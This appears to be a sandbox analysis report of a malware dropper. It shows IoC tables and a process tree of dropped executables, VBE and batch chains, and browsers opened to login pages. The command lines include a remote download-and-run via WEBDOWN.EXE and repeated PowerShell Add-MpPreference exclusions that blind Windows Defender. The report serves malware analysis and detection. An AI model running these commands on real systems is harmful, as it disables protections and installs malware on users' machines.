2528	fu.exe
2528	fu.exe
704	iexplore.exe
3024	iexplore.exe
580	iexplore.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe
2528	fu.exe

Suspicious use of SetWindowsHookEx 16 IoCs

pid	Process
3024	iexplore.exe
3024	iexplore.exe
1628	iexplore.exe
1628	iexplore.exe
580	iexplore.exe
580	iexplore.exe
704	iexplore.exe
704	iexplore.exe
604	IEXPLORE.EXE
604	IEXPLORE.EXE
2752	IEXPLORE.EXE
2752	IEXPLORE.EXE
1600	IEXPLORE.EXE
1600	IEXPLORE.EXE
2240	IEXPLORE.EXE
2240	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 2772 wrote to memory of 2528	2772	FUCKER.exe	29
PID 2772 wrote to memory of 2528	2772	FUCKER.exe	29
PID 2772 wrote to memory of 2528	2772	FUCKER.exe	29
PID 2772 wrote to memory of 2528	2772	FUCKER.exe	29
PID 2528 wrote to memory of 3024	2528	fu.exe	30
PID 2528 wrote to memory of 3024	2528	fu.exe	30
PID 2528 wrote to memory of 3024	2528	fu.exe	30
PID 2528 wrote to memory of 3024	2528	fu.exe	30
PID 2528 wrote to memory of 704	2528	fu.exe	31
PID 2528 wrote to memory of 704	2528	fu.exe	31
PID 2528 wrote to memory of 704	2528	fu.exe	31
PID 2528 wrote to memory of 704	2528	fu.exe	31
PID 2528 wrote to memory of 580	2528	fu.exe	32
PID 2528 wrote to memory of 580	2528	fu.exe	32
PID 2528 wrote to memory of 580	2528	fu.exe	32
PID 2528 wrote to memory of 580	2528	fu.exe	32
PID 2528 wrote to memory of 1628	2528	fu.exe	33
PID 2528 wrote to memory of 1628	2528	fu.exe	33
PID 2528 wrote to memory of 1628	2528	fu.exe	33
PID 2528 wrote to memory of 1628	2528	fu.exe	33
PID 3024 wrote to memory of 1600	3024	iexplore.exe	35
PID 3024 wrote to memory of 1600	3024	iexplore.exe	35
PID 3024 wrote to memory of 1600	3024	iexplore.exe	35
PID 3024 wrote to memory of 1600	3024	iexplore.exe	35
PID 1628 wrote to memory of 604	1628	iexplore.exe	36
PID 1628 wrote to memory of 604	1628	iexplore.exe	36
PID 1628 wrote to memory of 604	1628	iexplore.exe	36
PID 1628 wrote to memory of 604	1628	iexplore.exe	36
PID 580 wrote to memory of 2240	580	iexplore.exe	37
PID 580 wrote to memory of 2240	580	iexplore.exe	37
PID 580 wrote to memory of 2240	580	iexplore.exe	37
PID 580 wrote to memory of 2240	580	iexplore.exe	37
PID 704 wrote to memory of 2752	704	iexplore.exe	38
PID 704 wrote to memory of 2752	704	iexplore.exe	38
PID 704 wrote to memory of 2752	704	iexplore.exe	38
PID 704 wrote to memory of 2752	704	iexplore.exe	38

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4244	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Users\Admin\AppData\Local\Temp\Files\fu.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fu.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3024 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:1600
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.linkedin.com/login
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:704
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:704 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2752
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/video
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:580
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:580 CREDAT:275457 /prefetch:2
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:2240
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1628
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1628 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:604
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://www.youtube.com
    3⤵
    PID:1388
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://www.youtube.com
      4⤵
      PID:2284
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6609758,0x7fef6609768,0x7fef6609778
        5⤵
        
        PID:2744
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1124 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:2
        5⤵
        
        PID:3212
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1384 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:8
        5⤵
        
        PID:3996
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1464 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:8
        5⤵
        
        PID:4008
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2056 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:1
        5⤵
        
        PID:3232
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2064 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:1
        5⤵
        
        PID:3500
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2172 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:1
        5⤵
        
        PID:3908
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2192 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:1
        5⤵
        
        PID:4844
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:2
        5⤵
        
        PID:4872
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3064 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:1
        5⤵
        
        PID:3212
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4000 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:8
        5⤵
        
        PID:4588
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2640 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:8
        5⤵
        
        PID:4180
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3088 --field-trial-handle=1280,i,9116245828882389644,16913714605415192572,131072 /prefetch:8
        5⤵
        
        PID:4360
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://www.facebook.com/video
    3⤵
    PID:1948
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://www.facebook.com/video
      4⤵
      PID:2524
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6609758,0x7fef6609768,0x7fef6609778
        5⤵
        
        PID:2244
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1152,i,3163631121125438553,14702613300468338266,131072 /prefetch:2
        5⤵
        
        PID:3076
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" https://accounts.google.com
    3⤵
    PID:2208
  - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
      C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe https://accounts.google.com
      4⤵
      PID:1988
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6609758,0x7fef6609768,0x7fef6609778
        5⤵
        
        PID:2868
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1272,i,4754749469748622061,8136779387030948290,131072 /prefetch:2
        5⤵
        
        PID:3288
    - - C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe
        
        "C:\PROGRA~1\Google\Chrome\APPLIC~1\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1356 --field-trial-handle=1272,i,4754749469748622061,8136779387030948290,131072 /prefetch:8
        5⤵
        
        PID:4004
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://www.youtube.com
    3⤵
    PID:2032
  - - C:\PROGRA~1\MOZILL~1\firefox.exe
      C:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com
      4⤵
      PID:1928
    - - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        C:\PROGRA~1\MOZILL~1\firefox.exe https://www.youtube.com
        5⤵
        
        PID:1160
      - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="1160.0.1256328012\101028241" -parentBuildID 20221007134813 -prefsHandle 1016 -prefMapHandle 1008 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {3c4acc3d-3719-4298-8daa-9e75613656ff} 1160 "\\.\pipe\gecko-crash-server-pipe.1160" 1180 a4fb358 gpu
        6⤵
        
        PID:1288
      - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="1160.1.1289246337\1800348532" -parentBuildID 20221007134813 -prefsHandle 1312 -prefMapHandle 1308 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {619610fa-b57c-4bdb-8f46-4deffd585c57} 1160 "\\.\pipe\gecko-crash-server-pipe.1160" 1324 10540358 socket
        6⤵
        
        PID:5080
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://www.facebook.com/video
    3⤵
    PID:1780
  - - C:\PROGRA~1\MOZILL~1\firefox.exe
      C:\PROGRA~1\MOZILL~1\firefox.exe https://www.facebook.com/video
      4⤵
      PID:2676
    - - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        C:\PROGRA~1\MOZILL~1\firefox.exe https://www.facebook.com/video
        5⤵
        
        PID:2028
      - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="2028.0.923885199\975817938" -parentBuildID 20221007134813 -prefsHandle 1000 -prefMapHandle 992 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {7ca4c126-c868-48a7-ac40-14162de7fce2} 2028 "\\.\pipe\gecko-crash-server-pipe.2028" 1156 e8fb458 gpu
        6⤵
        
        PID:3668
      - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="2028.1.108324511\1638354853" -parentBuildID 20221007134813 -prefsHandle 1296 -prefMapHandle 1292 -prefsLen 17601 -prefMapSize 230321 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {9a6e28d4-6aab-472b-bf0c-f9bb1fd10544} 2028 "\\.\pipe\gecko-crash-server-pipe.2028" 1308 ed3e758 socket
        6⤵
        
        PID:5052
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\PROGRA~1\MOZILL~1\firefox.exe" https://accounts.google.com
    3⤵
    PID:1700
  - - C:\PROGRA~1\MOZILL~1\firefox.exe
      C:\PROGRA~1\MOZILL~1\firefox.exe https://accounts.google.com
      4⤵
      PID:2920
    - - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="2920.0.1671346857\70244537" -parentBuildID 20221007134813 -prefsHandle 1220 -prefMapHandle 1180 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {b6d605e2-4695-462f-acca-555351efb5fb} 2920 "\\.\pipe\gecko-crash-server-pipe.2920" 1296 fadeb58 gpu
        5⤵
        
        PID:3464
    - - C:\PROGRA~1\MOZILL~1\firefox.exe
        
        "C:\PROGRA~1\MOZILL~1\firefox.exe" -contentproc --channel="2920.1.704441869\468676833" -parentBuildID 20221007134813 -prefsHandle 1476 -prefMapHandle 1472 -prefsLen 21668 -prefMapSize 233444 -appDir "C:\PROGRA~1\MOZILL~1\browser" - {e8995980-3b33-44dc-a39a-f34ffd6d4483} 2920 "\\.\pipe\gecko-crash-server-pipe.2920" 1488 d70c58 socket
        5⤵
        
        PID:4724
- C:\Users\Admin\AppData\Local\Temp\Files\Gamma_Byte_20240225090825600.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Gamma_Byte_20240225090825600.exe"
  2⤵
  PID:1592
- - C:\Users\Admin\AppData\Local\Temp\3582-490\Gamma_Byte_20240225090825600.exe
    "C:\Users\Admin\AppData\Local\Temp\3582-490\Gamma_Byte_20240225090825600.exe"
    3⤵
    PID:1856
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\%E5%88~1.EXE"
  2⤵
  PID:2684
- - C:\Users\Admin\AppData\Local\Temp\Files\%E5%88~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\%E5%88~1.EXE
    3⤵
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\is-9L8PQ.tmp\%E5%88~1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-9L8PQ.tmp\%E5%88~1.tmp" /SL5="$2035E,1495449,832512,C:\Users\Admin\AppData\Local\Temp\Files\%E5%88~1.EXE"
      4⤵
      PID:836
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE"
  2⤵
  PID:2816
- - C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\FLT_SH~1.EXE
    3⤵
    PID:2216
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\loader.exe"
  2⤵
  PID:3492
- - C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
    C:\Users\Admin\AppData\Local\Temp\Files\loader.exe
    3⤵
    PID:2580
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RHSGN_~1.EXE"
      4⤵
      PID:4588
    - - C:\Users\Admin\AppData\Local\Temp\RHSGN_~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RHSGN_~1.EXE
        5⤵
        
        PID:5000
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\ARA.exe"
        6⤵
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\ARA.exe
        
        C:\Users\Admin\AppData\Local\Temp\ARA.exe
        7⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\aUs3pwix5Vd1U6IYzTsfZ9E8dEV3MF.vbe"
        8⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\WJgXY0RCE6WdWGoPyLk7f.bat" "
        9⤵
        
        PID:4820
        
        C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe
        
        "C:\Users\Admin\AppData\Roaming\reviewintobrokerHost\Msblockreview.exe"
        10⤵
        
        PID:4188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SsYf8FC5KE.bat"
        11⤵
        
        PID:4076
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        12⤵
        
        PID:2376
        
        C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\Gamma_Byte_20240225090825600.exe
        
        "C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\Gamma_Byte_20240225090825600.exe"
        12⤵
        
        PID:3228
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:3608
- - C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    C:\Users\Admin\AppData\Local\Temp\Files\net.exe
    3⤵
    PID:3832
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"
  2⤵
  PID:1020
- - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
    C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
    3⤵
    PID:648
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
      4⤵
      PID:4292
    - - C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE
        
        C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe RUN
        5⤵
        
        PID:4732
      - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
        6⤵
        
        PID:5060
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE"
  2⤵
  PID:4384
- - C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE
    C:\Users\Admin\AppData\Local\Temp\Files\QUANTU~1.EXE
    3⤵
    PID:4904
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
  2⤵
  PID:3772
- - C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
    C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
    3⤵
    PID:4272
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
      4⤵
      PID:4820
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
        5⤵
        
        PID:1520
      - C:\DriverHostCrtNet\comSvc.exe
        
        "C:\DriverHostCrtNet\comSvc.exe"
        6⤵
        
        PID:4432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        7⤵
        
        PID:3336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        7⤵
        
        PID:2480
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        7⤵
        
        PID:1992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
        7⤵
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
        7⤵
        
        PID:3836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        7⤵
        
        PID:3368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        7⤵
        
        PID:752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        7⤵
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        7⤵
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        7⤵
        
        PID:2012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        7⤵
        
        PID:4520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        7⤵
        
        PID:3604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        7⤵
        
        PID:3672
        
        C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe
        
        "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\cmd.exe"
        7⤵
        
        PID:924
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\16e11a01-956d-4983-be5e-1e2cbf086dee.vbs"
        8⤵
        
        PID:2392
        
